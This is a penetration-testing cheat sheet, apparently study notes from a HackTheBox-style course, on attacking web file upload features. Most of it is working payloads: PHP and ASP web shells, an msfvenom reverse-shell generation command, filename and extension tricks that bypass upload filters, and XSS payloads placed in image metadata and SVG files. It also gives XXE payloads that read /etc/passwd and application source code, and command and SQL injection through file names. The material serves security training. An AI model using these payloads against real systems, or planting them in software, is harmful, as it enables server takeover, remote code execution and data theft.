File Uploads
WebShells
One good option for PHP is phpbash, which provides a terminal-like, semi-interactive web shell.
SecLists provides a plethora of web shells for different frameworks and languages.
Cheatsheet
Web Shell Description
<?php file_get_contents('/etc/passwd'); ?> Basic PHP File Read
<?php system('hostname'); ?> Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?> Basic PHP Web Shell
<% eval request('cmd') %> Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shellPHP Web Shell
PHP Reverse Shell
List of Web Shells and Reverse Shells
ByPasses
Command
Description
Client-Side Bypass
[CTRL+SHIFT+C]
Toggle Page Insepctor
Blacklist Bypass
shell.phtml
Uncommon Extension
shell.pHp
Case Manipulation
List of PHP Extensions
List of ASP Extensions
List of Web Extensions
Whitelist Bypass
shell.jpg.php
Double Extension
shell.php.jpg
Reverse Double Extension
%20, %0a, %00, %0d0a, /, .\, ., …
Character Injection - Before/After Extension
Content/Type Bypass
List of Web Content-Types
List of All Content-Types
List of File Signatures/Magic Bytes
XSS
Many file types may allow us to introduce a Stored XSS vulnerability to the web application by uploading maliciously crafted versions of them.
The most basic example is when a web application allows us to upload HTML files. Although HTML files won't allow us to execute code (e.g., PHP), it would still be possible to implement JavaScript code within them to carry an XSS or CSRF attack on whoever visits the uploaded HTML page.
we can include an XSS payload in one of the Metadata parameters that accept raw text, like the Comment or Artist parameters, as follows:
exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
exiftool HTB.jpg
...SNIP...
Comment : "><img src=1 onerror=alert(window.origin)>XSS attacks can also be carried with SVG images, along with several other attacks. Scalable Vector Graphics (SVG) images are XML-based, and they describe 2D vector graphics, which the browser renders into an image. For this reason, we can modify their XML data to include an XSS payload. For example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" version="1.1" width="1" height="1">
<rect x="1" y="1" width="1" height="1" fill="green" stroke="black" />
<script type="text/javascript">alert("window.origin");</script>
</svg>XXE
With SVG images, we can also include malicious XML data to leak the source code of the web application, and other internal documents within the server
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>we can also use XXE to read source code in PHP web applications:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>Injections in File Name
For example, if we name a file file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami, and then the web application attempts to move the uploaded file with an OS command (e.g. mv file /tmp), then our file name would inject the whoami command, which would get executed giving us RCE.
Similarly, we may use an XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is disabled to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
Last updated